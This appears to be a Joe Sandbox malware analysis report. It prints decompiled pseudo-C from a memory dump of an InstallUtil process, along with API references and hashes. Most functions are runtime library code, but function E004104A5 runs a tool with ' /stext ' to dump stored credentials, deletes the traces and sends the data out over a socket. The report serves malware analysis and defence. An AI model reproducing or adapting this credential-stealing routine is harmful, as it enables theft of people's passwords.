												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t183;
													if( *_t183 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t183 =  *_t183 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t183;
												if( *_t183 <= 0) {
													goto L91;
												}
												_t180 = _v40;
												 *((short*)( *_t180)) =  *_t173;
												 *_t180 =  *_t180 + 2;
												 *_t183 =  *_t183 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t179 =  &(_t179[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t179 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t183;
												if( *_t183 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t179 =  &(_t179[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t183 =  *_t183 - 1;
												_t159 =  *_t179 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E0044F785(_t145, _t179, _t183, _t179, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E0044F785(_t145, _t179, _t183, _t179, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t179[3]);
											}
										} else {
											_t153 =  &(_t179[5]);
											_v28 =  &(_t179[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t203 = _v33;
							if(_v33 == 0) {
								_t133 = E004448AB(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
							} else {
								_t133 = E004449ED(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
							}
							_t181 = _t184;
							_t177 = _t133 - 1;
							if(_t177 <= 0) {
								L27:
								E00432753(_t184);
								goto L28;
							} else {
								_t148 = _v32;
								_t185 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t181;
									_t181 = _t181 + 2;
									 *( *_t185) = _t135;
									 *_t185 =  &(( *_t185)[0]);
									 *_t148 =  *_t148 - 1;
									_t177 = _t177 - 1;
									if(_t177 > 0) {
										continue;
									}
									break;
								}
								_t184 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t186 = E004421F7(_t165, _t137 & _t165);
							_v28 = _t186;
							_pop(_t165);
							__eflags = _t186;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t186 = 0xdddd;
							L14:
							_t184 = _t186 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E00452F00();
						_t186 = _t188;
						_v28 = _t186;
						if(_t186 == 0) {
							goto L30;
						}
						 *_t186 = 0xcccc;
						goto L14;
					}
				}
			}

0x004435b1
0x004435b9
0x004435c0
0x004435c6
0x004435c9
0x004435d0
0x004435d3
0x004435d9
0x004435dc
0x004435e0
0x004435e3
0x004435e7
0x004435ea
0x00443601
0x004435ec
0x004435ef
0x004435f9
0x004435f1
0x004435f1
0x004435f1
0x004435ef
0x0044360e
0x00000000
0x00443614
0x0044361d
0x00443624
0x0044362e
0x00443631
0x00443639
0x00443641
0x00443649
0x00443650
0x00443656
0x0044365d
0x0044365f
0x00443675
0x00443683
0x00443661
0x0044366e
0x0044366e
0x00443688
0x0044368c
0x00000000
0x00443692
0x00443692
0x00443695
0x0044369a
0x0044369e
0x004436f8
0x004436f8
0x004436fa
0x004436fa
0x004436ff
0x0044377f
0x00443781
0x00443786
0x004439fd
0x004439fd
0x004439fd
0x00443a00
0x00443a03
0x00000000
0x00000000
0x0044378f
0x00443792
0x00443769
0x0044376b
0x0044377e
0x0044377e
0x00443794
0x00443798
0x00443798
0x0044379a
0x0044379d
0x0044379f
0x004437a2
0x004437a2
0x004437a5
0x004437a6
0x004437a6
0x004437ab
0x004437ae
0x004437b1
0x004437b4
0x004437b7
0x004438ec
0x004438ec
0x004438ef
0x004439bc
0x004439bc
0x004439bf
0x004439d8
0x004439dc
0x004439dc
0x004439de
0x004439de
0x004439eb
0x004439ee
0x004439f3
0x004439f6
0x004439f8
0x00443a13
0x00000000
0x00443a19
0x004439fa
0x004439fa
0x00000000
0x004439fa
0x004439c1
0x004439c1
0x004439c4
0x00000000
0x00000000
0x004439c6
0x004439c6
0x004439c9
0x004439ce
0x004439d1
0x004439d4
0x00000000
0x004439d4
0x004438f5
0x004438f5
0x004438f8
0x004439a8
0x004439a8
0x004439ab
0x004439b4
0x004439b8
0x004439b8
0x00000000
0x004439b8
0x004439ad
0x004439ad
0x004439b0
0x00000000
0x00000000
0x00000000
0x004439b2
0x004438fe
0x004438fe
0x00443901
0x00443994
0x00443994
0x00443997
0x004439a0
0x004439a4
0x004439a4
0x00000000
0x004439a4
0x00443999
0x00443999
0x0044399c
0x00000000
0x00000000
0x00000000
0x0044399e
0x00443907
0x00443907
0x0044390a
0x00443933
0x00443936
0x0044393a
0x00443944
0x0044393c
0x0044393c
0x0044393c
0x0044394a
0x0044394d
0x00443969
0x00443969
0x0044396c
0x0044396f
0x00000000
0x00000000
0x00443975
0x00443978
0x00443978
0x0044397b
0x00000000
0x00000000
0x0044397f
0x00443982
0x00443985
0x00443988
0x0044398a
0x0044398d
0x00443990
0x00000000
0x00000000
0x00000000
0x00443992
0x0044394f
0x0044394f
0x00443952
0x00000000
0x00000000
0x00443954
0x0044395c
0x0044395f
0x00443962
0x00443962
0x00000000
0x0044394d
0x0044390c
0x0044390f
0x00000000
0x00000000
0x00443916
0x00443916
0x00443919
0x0044392c
0x00000000
0x0044392c
0x0044391c
0x0044391c
0x0044391f
0x00000000
0x00000000
0x00443925
0x00000000
0x00443925
0x004437bd
0x004438bb
0x004438bb
0x004438be
0x004438e1
0x004438e5
0x004438e5
0x00000000
0x004438e5
0x004438c0
0x004438c0
0x004438c3
0x00000000
0x00000000
0x004438c5
0x004438c5
0x004438c8
0x004438da
0x00000000
0x004438da
0x004438ca
0x004438ca
0x004438cd
0x00000000
0x00000000
0x004438d3
0x00000000
0x004438d3
0x004437c3
0x004437c6
0x00443868
0x00443868
0x0044386d
0x00443873
0x00443873
0x00443874
0x00443877
0x0044387d
0x00443880
0x00443883
0x00000000
0x00000000
0x00443889
0x0044388c
0x0044388c
0x0044388f
0x00000000
0x00000000
0x00443897
0x00443898
0x0044389b
0x0044389e
0x00000000
0x00000000
0x004438a6
0x004438a9
0x004438ac
0x004438ae
0x004438b1
0x004438b4
0x00000000
0x00000000
0x00000000
0x004438b6
0x0044388c
0x00000000
0x00443877
0x004437cc
0x004437cf
0x004437e4
0x004437ea
0x004437f1
0x004437f3
0x0044384e
0x00443854
0x00443855
0x00443857
0x0044385c
0x0044385c
0x004437f5
0x004437f5
0x004437f8
0x004437f8
0x0044385f
0x00000000
0x0044385f
0x004437d1
0x004437d4
0x0044382e
0x0044382e
0x00443831
0x0044383d
0x00443841
0x00443841
0x00000000
0x00443841
0x00443833
0x00443833
0x00443836
0x00000000
0x00000000
0x00000000
0x00443838
0x004437d6
0x004437d9
0x004437fd
0x004437fd
0x00443800
0x00443823
0x00443827
0x00443827
0x00000000
0x00443827
0x00443802
0x00443802
0x00443805
0x00000000
0x00000000
0x00443807
0x00443807
0x0044380a
0x0044381c
0x00000000
0x0044381c
0x0044380c
0x0044380c
0x0044380f
0x00000000
0x00000000
0x00443815
0x00000000
0x00443815
0x004437db
0x004437de
0x00000000
0x00000000
0x00000000
0x004437de
0x00000000
0x00443a09
0x00443701
0x00443708
0x00443731
0x0044370a
0x00443719
0x00443719
0x00443738
0x0044373a
0x0044373d
0x00443762
0x00443763
0x00000000
0x0044373f
0x0044373f
0x00443742
0x00443745
0x0044374c
0x0044374f
0x00443752
0x00443755
0x00443758
0x0044375a
0x0044375d
0x00000000
0x00000000
0x00000000
0x0044375d
0x0044375f
0x00000000
0x0044375f
0x0044373d
0x004436a5
0x004436a7
0x004436a9
0x004436b1
0x004436d6
0x004436d8
0x004436e2
0x004436e4
0x004436e7
0x004436e8
0x004436ea
0x00000000
0x00000000
0x004436f0
0x004436d1
0x004436d1
0x00000000
0x004436d1
0x004436b5
0x004436b9
0x004436be
0x004436c0
0x004436c5
0x00000000
0x00000000
0x004436cb
0x00000000
0x004436cb
0x0044368c

APIs

__alloca_probe_16.LIBCMT ref: 004436B9
__freea.LIBCMT ref: 00443763
__freea.LIBCMT ref: 00443781

Part of subcall function 00432753: _free.LIBCMT ref: 00432769

Strings

a/p, xrefs: 00443848
am/pm, xrefs: 004437E4
(;D, xrefs: 004439EB

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: (;D$a/p$am/pm
API String ID: 2936374016-4206748460
Opcode ID: 925600388eae5b9fe5ef28ee20559011114447a4b99b619c121301e124caed8f
Instruction ID: d3242138bb380283d0fad9c9d15e7918e02d65915b858a35401e0b6ff28c876c
Opcode Fuzzy Hash: 925600388eae5b9fe5ef28ee20559011114447a4b99b619c121301e124caed8f
Instruction Fuzzy Hash: ACD112B1A00206DAFB289F68C4467BBB7B0FF04B12F28411BE5459B345D3BD9E41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004104A5 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 374
filesleepCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004104A5(void* __eflags, void* _a4, void* _a8, char _a28, void* _a32, char _a52, void* _a56, char _a72, void* _a80, char _a92) {
				void* _v16;
				short _v524;
				char _v528;
				char _v532;
				char _v536;
				char _v548;
				void* _v552;
				char _v576;
				char _v600;
				char _v624;
				char _v644;
				char _v652;
				char _v668;
				void* _v672;
				char _v676;
				char _v692;
				void* _v696;
				char _v700;
				char _v716;
				void* _v720;
				void* _v736;
				char _v740;
				void* _v760;
				char _v764;
				void* _v784;
				char _v788;
				void* _v808;
				char _v812;
				char _v816;
				void* _v832;
				char _v836;
				char _v844;
				void* _v856;
				char _v860;
				char _v868;
				void* _v872;
				char _v884;
				void* _v888;
				char _v896;
				char _v908;
				void* _v912;
				char _v920;
				char _v932;
				void* _v936;
				char _v944;
				char _v956;
				char _v960;
				void* _v964;
				char _v980;
				char _v984;
				intOrPtr _v985;
				char _v986;
				char _v987;
				char _v997;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t130;
				void* _t142;
				void* _t173;
				void* _t199;
				void* _t225;
				void* _t226;
				void* _t394;
				void* _t399;
				void* _t403;
				void* _t406;

				_t406 = __eflags;
				_v984 = 0;
				GetModuleFileNameW(0,  &_v524, 0x104);
				_v987 = 0;
				_v986 = 0;
				E0040209F(0,  &_v716);
				E0040209F(0,  &_v740);
				E0040209F(0,  &_v764);
				E00419012( &_v788, 0x30, E00401F6B(E00418114( &_v980)));
				E00401F98();
				E00419012( &_v812, 0x30, E00401F6B(E00418114( &_v980)));
				E00401F98();
				E00419012( &_v836, 0x30, E00401F6B(E00418114( &_v980)));
				E00401F98();
				_t130 = E00401F6B( &_a52);
				_t402 = "\"";
				_t393 = L" /stext \"";
				_t224 = E004150C2(E00401EC4(E00402FD4(0,  &_v624, E004042DD(0,  &_v600, E004042BC(0,  &_v576,  &_v528, _t402, _t406, E0040413E(0,  &_v548, 0x30, "\"", L" /stext \"")), _t402, _t406,  &_v788), L" /stext \"", _t402, _t406, _t402)));
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				_t142 = E00401F6B( &_a72);
				_t225 = E004150C2(E00401EC4(E00402FD4(_t224,  &_v700, E004042DD(_t137,  &_v676, E004042BC(_t137,  &_v652,  &_v532, _t402, _t406, E0040413E(_t137,  &_v960, _t130, _t402, _t393)), _t402, _t406,  &_v816), _t393, _t402, _t406, _t402)));
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401F6B( &_a92);
				_v997 = E004150C2(E00401EC4(E00402FD4(_t225,  &_v944, E004042DD(_t225,  &_v920, E004042BC(_t225,  &_v896,  &_v536, _t402, _t406, E0040413E(_t225,  &_v868, _t142, _t402, _t393)), _t402, _t406,  &_v844), _t393, _t402, _t406, _t402)));
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				_t399 =  ==  ? 1 : 0;
				if(_t225 == 0) {
					_t399 = _t399 + 1;
				}
				if(_v985 == 0) {
					_t399 = _t399 + 1;
				}
				_t226 = DeleteFileW;
				_t394 = 0;
				while(1) {
					E00401EC4( &_v788);
					if(E004189A5( &_v716) != 0) {
						_v984 = 1;
						DeleteFileW(E00401EC4( &_v788));
					}
					E00401EC4( &_v812);
					if(E004189A5( &_v740) != 0) {
						_v987 = 1;
						DeleteFileW(E00401EC4( &_v812));
					}
					E00401EC4( &_v836);
					if(E004189A5( &_v764) != 0) {
						_v986 = 1;
						DeleteFileW(E00401EC4( &_v836));
					}
					if(_v984 != 0 && _v987 != 0 && _v986 != 0) {
						break;
					}
					Sleep(0x1f4);
					_t394 = _t394 + 1;
					if(_t394 < 0xa) {
						continue;
					}
					break;
				}
				_t173 = E00405ADC("0");
				_t419 = _t173;
				if(_t173 == 0) {
					E00402ED0(_t226, _t403 - 0x18, E00402ED0(_t226,  &_v860, E00402ED0(_t226,  &_v884, E00402ED0(_t226,  &_v908, E00402ED0(_t226,  &_v932, E00402EF1( &_v956,  &_a28, _t402, 0x46e260), _t402, __eflags,  &_v716), _t402, __eflags, 0x46e260), _t402, __eflags,  &_v740), _t402, __eflags, 0x46e260), _t402, __eflags,  &_v764);
					_push(0x6a);
					E00404A78(0x46e6f0, _t180, __eflags);
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
				} else {
					_t199 = E004182D1(_t226,  &_v692, _t399);
					E00402E61(_t403 - 0x18, E00402ED0(_t226,  &_v860, E00402ED0(_t226,  &_v884, E00402ED0(_t226,  &_v908, E00402ED0(_t226,  &_v932, E00402ED0(_t226,  &_v956, E00402ED0(_t226,  &_v644, E00402EF1( &_v668,  &_a28, _t402, 0x46e260), _t402, _t419,  &_v716), _t402, _t419, 0x46e260), _t402, _t419,  &_v740), _t402, _t419, 0x46e260), _t402, _t419,  &_v764), _t402, _t419, 0x46e260), _t199);
					_push(0x69);
					E00404A78(0x46e6f0, _t207, _t419);
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
					E00401F98();
				}
				E00401F98();
				E00401EC9();
				E00401EC9();
				E00401EC9();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				E00401F98();
				return E00401F98();
			}

0x004104a5
0x004104bf
0x004104c3
0x004104d0
0x004104d4
0x004104d8
0x004104e4
0x004104f0
0x0041050f
0x00410519
0x00410538
0x00410542
0x00410561
0x0041056b
0x00410577
0x00410585
0x00410593
0x004105e8
0x004105ea
0x004105f6
0x00410602
0x0041060e
0x0041061a
0x0041067e
0x00410680
0x0041068c
0x00410698
0x004106a1
0x004106ad
0x0041070b
0x0041070f
0x00410718
0x00410721
0x0041072d
0x0041073b
0x00410740
0x00410742
0x00410742
0x00410747
0x00410749
0x00410749
0x0041074a
0x00410750
0x00410752
0x00410759
0x0041076e
0x00410777
0x00410782
0x00410782
0x0041078b
0x004107a0
0x004107a9
0x004107b4
0x004107b4
0x004107bd
0x004107d2
0x004107db
0x004107e6
0x004107e6
0x004107ed
0x00000000
0x00000000
0x00410802
0x00410808
0x0041080c
0x00000000
0x00000000
0x00000000
0x0041080c
0x0041081e
0x00410823
0x00410825
0x004109a5
0x004109ab
0x004109b2
0x004109be
0x004109c7
0x004109d0
0x004109d9
0x0041082b
0x00410834
0x004108cc
0x004108d2
0x004108d9
0x004108e5
0x004108ee
0x004108f7
0x00410900
0x00410909
0x00410915
0x00410921
0x00410926
0x004109e2
0x004109ee
0x004109fa
0x00410a06
0x00410a12
0x00410a1e
0x00410a2a
0x00410a36
0x00410a42
0x00410a4e
0x00410a5a
0x00410a75

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004104C3

Part of subcall function 00418114: GetCurrentProcessId.KERNEL32(00000000,76F1FBB0,00000000,?,?,?,?,004610EC,0040B043,.vbs,?,?,?,?,?,0046E5A0), ref: 0041813B

Part of subcall function 004150C2: CloseHandle.KERNEL32(004040B5,?,004040B5,00460E24), ref: 004150D8
Part of subcall function 004150C2: CloseHandle.KERNEL32(00460E24,?,004040B5,00460E24), ref: 004150E1

DeleteFileW.KERNEL32(00000000,00460E24,00460E24), ref: 00410782
DeleteFileW.KERNEL32(00000000,00460E24,00460E24,00460E24), ref: 004107B4
DeleteFileW.KERNEL32(00000000,00460E24,00460E24,00460E24), ref: 004107E6
Sleep.KERNEL32(000001F4,00460E24,00460E24), ref: 00410802

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

Strings

/stext ", xrefs: 00410593, 00410598, 0041062E, 004106C4

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcessSleepsend
String ID: /stext "
API String ID: 1351907930-3856184850
Opcode ID: 0491deb063fce47d69cdaf35a6836c3182c23433c2ff0308d8676163c6bc412c
Instruction ID: 360a572785ef5307357cc913acf5e4219c6e157c246405b70e1dfce6b01e80ff
Opcode Fuzzy Hash: 0491deb063fce47d69cdaf35a6836c3182c23433c2ff0308d8676163c6bc412c
Instruction Fuzzy Hash: F9D158311183814BC329F735D851AEFB3D5AF95308F40493FB48A531E2EF78598AC69A

Uniqueness

Uniqueness Score: -1.00%

Function 0044C796 Relevance: 10.7, APIs: 7, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0044C796(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E00441BB3(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E004421F7(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E004427C2(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x46c178; // 0x46c170
								 *_t133 = _t57;
								_t58 =  *0x46c17c; // 0x46d64c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x46c180; // 0x46d64c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x46c1a8; // 0x46c174
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x46c1ac; // 0x46d650
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E004421F7(_t107, 4);
							_v20 = _t134;
							E004427C2(0);
							if(_t134 == 0) {
								L11:
								E004427C2(_v8);
								E004427C2(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E0044EBE5(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E0044EBE5(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E0044EBE5(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E0044EBE5(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E0044EBE5(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E0044C72D(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E004427C2(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x46c178;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E004427C2( *((intOrPtr*)(_t100 + 0x7c)));
							E004427C2( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}

0x0044c796
0x0044c79f
0x0044c7a6
0x0044c7a9
0x0044c7b2
0x0044c7d1
0x0044c7d4
0x0044c7d9
0x0044c7e0
0x0044c7f3
0x0044c7f4
0x0044c7fd
0x0044c7ff
0x0044c802
0x0044c805
0x0044c80b
0x0044c80e
0x0044c821
0x0044c829
0x0044c983
0x0044c986
0x0044c98b
0x0044c98d
0x0044c992
0x0044c995
0x0044c99a
0x0044c99d
0x0044c9a2
0x0044c9a5
0x0044c9aa
0x0044c913
0x0044c919
0x0044c91d
0x0044c91f
0x0044c91f
0x00000000
0x0044c91d
0x0044c836
0x0044c839
0x0044c83c
0x0044c845
0x0044c8da
0x0044c8dd
0x0044c8e6
0x00000000
0x0044c8ef
0x0044c84e
0x0044c853
0x0044c867
0x0044c87b
0x0044c887
0x0044c895
0x0044c8af
0x0044c8cb
0x0044c8f5
0x0044c908
0x0044c8f9
0x0044c8fd
0x0044c970
0x00000000
0x00000000
0x0044c972
0x0044c974
0x0044c977
0x0044c979
0x0044c97c
0x0044c903
0x0044c905
0x0044c907
0x0044c907
0x0044c907
0x0044c8fd
0x0044c90d
0x0044c910
0x00000000
0x0044c910
0x0044c8d0
0x0044c8d5
0x00000000
0x0044c8d9
0x0044c813
0x00000000
0x0044c81b
0x00000000
0x0044c7bc
0x0044c7bc
0x0044c7be
0x0044c7c1
0x0044c921
0x0044c921
0x0044c929
0x0044c92b
0x0044c92b
0x0044c933
0x0044c938
0x0044c93c
0x0044c941
0x0044c94c
0x0044c952
0x0044c93c
0x0044c956
0x0044c95b
0x0044c961
0x00000000
0x0044c961

APIs

_free.LIBCMT ref: 0044C805
_free.LIBCMT ref: 0044C813
_free.LIBCMT ref: 0044C941
_free.LIBCMT ref: 0044C94C

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 431cc729f4285e9de773e2587d7be0d99c6a6d89c567df6338a0676290dc4830
Instruction ID: 2201e75b111225be368d50658d4eda75df7e0c7c63c2950a9ed7280f3aa06522
Opcode Fuzzy Hash: 431cc729f4285e9de773e2587d7be0d99c6a6d89c567df6338a0676290dc4830
Instruction Fuzzy Hash: 0F61D275E01205AFFB60DF69C881BAABBF4FF05710F18416BE944EB281E7749D418B58

Uniqueness

Uniqueness Score: -1.00%

Function 00446268 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E00446268(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46d800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46d800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00441C10(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
